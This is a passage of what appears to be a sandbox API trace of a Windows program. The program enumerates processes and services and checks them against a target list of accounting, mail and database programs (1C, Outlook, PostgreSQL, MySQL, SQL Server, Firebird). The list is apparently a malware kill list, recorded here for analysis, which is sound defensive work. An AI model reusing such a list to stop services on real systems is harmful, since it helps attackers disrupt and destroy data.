lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0176.219] lstrlenW (lpString="mxslipstream.exe") returned 16 [0176.219] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0176.220] lstrlenW (lpString="omnipos.exe") returned 11 [0176.220] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0176.221] lstrlenW (lpString="spcwin.exe") returned 10 [0176.221] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0176.222] lstrlenW (lpString="spgagentservice.exe") returned 19 [0176.222] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0176.222] lstrlenW (lpString="utg2.exe") returned 8 [0176.222] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0176.223] lstrlenW (lpString="lb_community.exe") returned 16 [0176.223] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0176.224] lstrlenW (lpString="miniature.exe") returned 13 [0176.224] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0176.225] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0176.225] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0176.225] lstrlenW (lpString="operation-environments.exe") returned 26 [0176.225] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.226] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0176.226] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0176.227] lstrlenW (lpString="taskhostw.exe") returned 13 [0176.227] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0176.228] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0176.228] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0176.228] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0176.228] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0176.229] lstrlenW (lpString="conhost.exe") returned 11 [0176.229] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0176.230] lstrlenW (lpString="sppsvc.exe") returned 10 [0176.230] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0176.654] lstrlenW (lpString="dllhost.exe") returned 11 [0176.654] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0176.655] lstrlenW (lpString="wdgmug.exe") returned 10 [0176.655] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0176.656] lstrlenW (lpString="cmd.exe") returned 7 [0176.658] lstrcmpiW (lpString1="1c8.exe", lpString2="cmd.exe") returned -1 [0176.658] lstrcmpiW (lpString1="1cv77.exe", lpString2="cmd.exe") returned -1 [0176.658] lstrcmpiW (lpString1="outlook.exe", lpString2="cmd.exe") returned 1 [0176.659] lstrcmpiW (lpString1="postgres.exe", lpString2="cmd.exe") returned 1 [0176.659] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="cmd.exe") returned 1 [0176.659] lstrcmpiW (lpString1="mysqld.exe", lpString2="cmd.exe") returned 1 [0176.659] lstrcmpiW (lpString1="sqlservr.exe", lpString2="cmd.exe") returned 1 [0176.659] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0176.660] lstrlenW (lpString="conhost.exe") returned 11 [0176.660] lstrcmpiW (lpString1="1c8.exe", lpString2="conhost.exe") returned -1 [0176.660] lstrcmpiW (lpString1="1cv77.exe", lpString2="conhost.exe") returned -1 [0176.660] lstrcmpiW (lpString1="outlook.exe", lpString2="conhost.exe") returned 1 [0176.660] lstrcmpiW (lpString1="postgres.exe", lpString2="conhost.exe") returned 1 [0176.660] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="conhost.exe") returned 1 [0176.660] lstrcmpiW (lpString1="mysqld.exe", lpString2="conhost.exe") returned 1 [0176.660] lstrcmpiW (lpString1="sqlservr.exe", lpString2="conhost.exe") returned 1 [0176.660] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0176.661] lstrlenW (lpString="sc.exe") returned 6 [0176.661] lstrcmpiW (lpString1="1c8.exe", lpString2="sc.exe") returned -1 [0176.661] lstrcmpiW (lpString1="1cv77.exe", lpString2="sc.exe") returned -1 [0176.661] lstrcmpiW (lpString1="outlook.exe", lpString2="sc.exe") returned -1 [0176.661] lstrcmpiW (lpString1="postgres.exe", lpString2="sc.exe") returned -1 [0176.661] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="sc.exe") returned -1 [0176.661] lstrcmpiW (lpString1="mysqld.exe", lpString2="sc.exe") returned -1 [0176.661] lstrcmpiW (lpString1="sqlservr.exe", lpString2="sc.exe") returned 1 [0176.661] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x764, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0176.662] lstrlenW (lpString="conhost.exe") returned 11 [0176.662] lstrcmpiW (lpString1="1c8.exe", lpString2="conhost.exe") returned -1 [0176.662] lstrcmpiW (lpString1="1cv77.exe", lpString2="conhost.exe") returned -1 [0176.662] lstrcmpiW (lpString1="outlook.exe", lpString2="conhost.exe") returned 1 [0176.662] lstrcmpiW (lpString1="postgres.exe", lpString2="conhost.exe") returned 1 [0176.662] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="conhost.exe") returned 1 [0176.662] lstrcmpiW (lpString1="mysqld.exe", lpString2="conhost.exe") returned 1 [0176.662] lstrcmpiW (lpString1="sqlservr.exe", lpString2="conhost.exe") returned 1 [0176.663] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0176.663] lstrlenW (lpString="WMIADAP.exe") returned 11 [0176.663] lstrcmpiW (lpString1="1c8.exe", lpString2="WMIADAP.exe") returned -1 [0176.664] lstrcmpiW (lpString1="1cv77.exe", lpString2="WMIADAP.exe") returned -1 [0176.664] lstrcmpiW (lpString1="outlook.exe", lpString2="WMIADAP.exe") returned -1 [0176.664] lstrcmpiW (lpString1="postgres.exe", lpString2="WMIADAP.exe") returned -1 [0176.664] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="WMIADAP.exe") returned -1 [0176.664] lstrcmpiW (lpString1="mysqld.exe", lpString2="WMIADAP.exe") returned -1 [0176.664] lstrcmpiW (lpString1="sqlservr.exe", lpString2="WMIADAP.exe") returned -1 [0176.664] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0176.665] CloseHandle (hObject=0x384) returned 1 [0176.665] Sleep (dwMilliseconds=0x1f4) [0179.301] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74ee08 [0179.304] EnumServicesStatusExW (in: hSCManager=0x74ee08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0179.307] GetLastError () returned 0xea [0179.307] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1d8a) returned 0x772a60 [0179.308] EnumServicesStatusExW (in: hSCManager=0x74ee08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x772a60, cbBufSize=0x1d8a, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x772a60, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0179.310] CloseServiceHandle (hSCObject=0x74ee08) returned 1 [0179.314] lstrlenW (lpString="Appinfo") returned 7 [0179.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0179.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0179.314] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0179.314] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0179.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0179.314] lstrlenW (lpString="AppXSvc") returned 7 [0179.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0179.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0179.314] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0179.314] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0179.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0179.314] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0179.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0179.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0179.315] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0179.315] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0179.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0179.315] lstrlenW (lpString="Audiosrv") returned 8 [0179.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0179.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0179.315] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0179.315] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0179.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0179.315] lstrlenW (lpString="BFE") returned 3 [0179.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0179.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0179.315] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0179.315] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0179.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0179.315] lstrlenW (lpString="BITS") returned 4 [0179.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0179.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0179.315] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0179.315] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0179.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0179.315] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0179.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0179.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0179.315] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0179.315] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0179.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0179.316] lstrlenW (lpString="CDPSvc") returned 6 [0179.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0179.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0179.316] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0179.316] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0179.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0179.316] lstrlenW (lpString="ClickToRunSvc") returned 13 [0179.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0179.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0179.316] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0179.316] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0179.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0179.316] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0179.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0179.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0179.316] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0179.316] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0179.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0179.316] lstrlenW (lpString="CryptSvc") returned 8 [0179.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0179.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0179.316] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0179.316] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0179.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0179.316] lstrlenW (lpString="DcomLaunch") returned 10 [0179.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0179.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0179.317] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0179.317] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0179.317] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0179.317] lstrlenW (lpString="Dhcp") returned 4 [0179.317] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0179.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0179.317] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0179.317] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0179.317] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0179.317] lstrlenW (lpString="Dnscache") returned 8 [0179.317] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0179.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0179.317] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0179.317] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0179.317] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0179.317] lstrlenW (lpString="DoSvc") returned 5 [0179.317] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0179.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0179.317] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0179.317] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0179.317] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0179.317] lstrlenW (lpString="DPS") returned 3 [0179.317] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0179.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0179.317] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0179.317] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0179.317] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0179.317] lstrlenW (lpString="DusmSvc") returned 7 [0179.318] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0179.318] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0179.318] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0179.318] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0179.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0179.318] lstrlenW (lpString="EventLog") returned 8 [0179.318] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0179.318] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0179.318] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0179.318] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0179.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0179.318] lstrlenW (lpString="EventSystem") returned 11 [0179.318] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0179.318] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0179.318] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0179.318] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0179.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0179.318] lstrlenW (lpString="FontCache") returned 9 [0179.318] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0179.318] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0179.318] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0179.318] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0179.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0179.318] lstrlenW (lpString="gpsvc") returned 5 [0179.318] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0179.318] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0179.318] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0179.318] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0179.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0179.319] lstrlenW (lpString="iphlpsvc") returned 8 [0179.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0179.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0179.319] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0179.319] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0179.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0179.319] lstrlenW (lpString="KeyIso") returned 6 [0179.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0179.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0179.319] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0179.319] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0179.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0179.319] lstrlenW (lpString="LanmanServer") returned 12 [0179.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0179.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0179.319] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0179.319] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0179.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0179.319] lstrlenW (lpString="LanmanWorkstation") returned 17 [0179.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0179.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0179.319] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0179.319] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0179.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0179.319] lstrlenW (lpString="lfsvc") returned 5 [0179.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0179.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0179.320] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0179.320] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0179.320] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0179.320] lstrlenW (lpString="lmhosts") returned 7 [0179.320] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0179.320] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0179.320] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0179.320] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0179.320] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0179.320] lstrlenW (lpString="LSM") returned 3 [0179.320] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0179.320] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0179.320] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0179.320] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0179.320] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0179.320] lstrlenW (lpString="MpsSvc") returned 6 [0179.320] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0179.320] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0179.320] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0179.320] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0179.320] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0179.320] lstrlenW (lpString="NcbService") returned 10 [0179.320] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0179.320] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0179.320] lstrcmpiW 